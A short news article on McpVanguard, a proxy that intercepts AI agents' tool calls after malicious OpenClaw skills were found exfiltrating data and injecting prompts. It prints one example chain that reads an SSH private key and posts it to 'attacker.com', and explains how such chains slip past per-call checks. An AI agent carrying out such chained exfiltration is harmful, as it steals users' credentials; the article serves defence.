McpVanguard Proxy Blocks OpenClaw Skill Data Exfiltration

In response to Cisco's AI security team discovering third-party OpenClaw skills performing silent data exfiltration and prompt injection, a developer has released McpVanguard, a proxy designed to sit between an AI agent and its tools to block malicious calls before they execute.
The Problem: Chained Malicious Calls
The security issue isn't a bug in OpenClaw itself, but a consequence of agents having filesystem access, shell execution, and network calls without enforcement boundaries. Cisco's testing revealed a pattern where seemingly innocent individual calls combine to create a breach, such as:
read_file("~/.ssh/id_rsa") → http_post("attacker.com", contents)Neither call appears malicious in isolation, but together they exfiltrate sensitive data. According to the source, ClawHub had over 820 malicious skills at its peak, and CVE-2026-25253 allowed attackers to achieve remote code execution through a single malicious link. Current skill-level validation fails to detect these chained call sequences.
The Solution: McpVanguard Proxy
McpVanguard addresses this by intercepting calls between the agent and its tools. It uses three detection methods:
- Pattern matching
- Semantic intent scoring
- Behavioral chain detection across the entire session
Installation is via pip: pip install mcp-vanguard.
Deeper Layer: VEX Protocol
The project includes a deeper security layer called VEX Protocol, described as a "flight recorder" system. It provides:
- Merkle audit trails for tamper-evident logging
- TPM-rooted agent identity verification
- Syscall-level enforcement
VEX Protocol is built in Rust and development began in December 2023, before OpenClaw gained widespread popularity. The source notes that NVIDIA has recently shipped NemoClaw for similar security purposes, indicating this type of threat isn't going away.
Both projects are available on GitHub:
📖 Read the full source: r/openclaw
👀 See Also

Stop Trusting AI More Than a Human — Apply the Same Access Controls
A Reddit discussion argues that AI coding agents should be treated like junior devs — no prod access, no direct writes, enforce CI/CD pipelines and role-based permissions.

Agent Hush: Open-source tool prevents AI coding agents from leaking sensitive data
Agent Hush is an open-source tool that catches sensitive data before it leaves your machine, created after a developer's AI coding agent leaked API keys, server IPs, and personal info to a public GitHub repo while building a security project.

OpenClaw 2026.3.28 patches 8 security vulnerabilities including critical privilege escalation
OpenClaw 2026.3.28 patches 8 security vulnerabilities discovered by Ant AI Security Lab, including a critical privilege escalation via /pair approve and a high severity sandbox escape in the message tool.

Cloak tool replaces chat passwords with self-destructing links for OpenClaw agents
Cloak is an open source tool that replaces passwords shared in chat with OpenClaw agents with self-destructing links. Each link can only be opened once, then the password disappears, preventing passwords from accumulating in chat histories.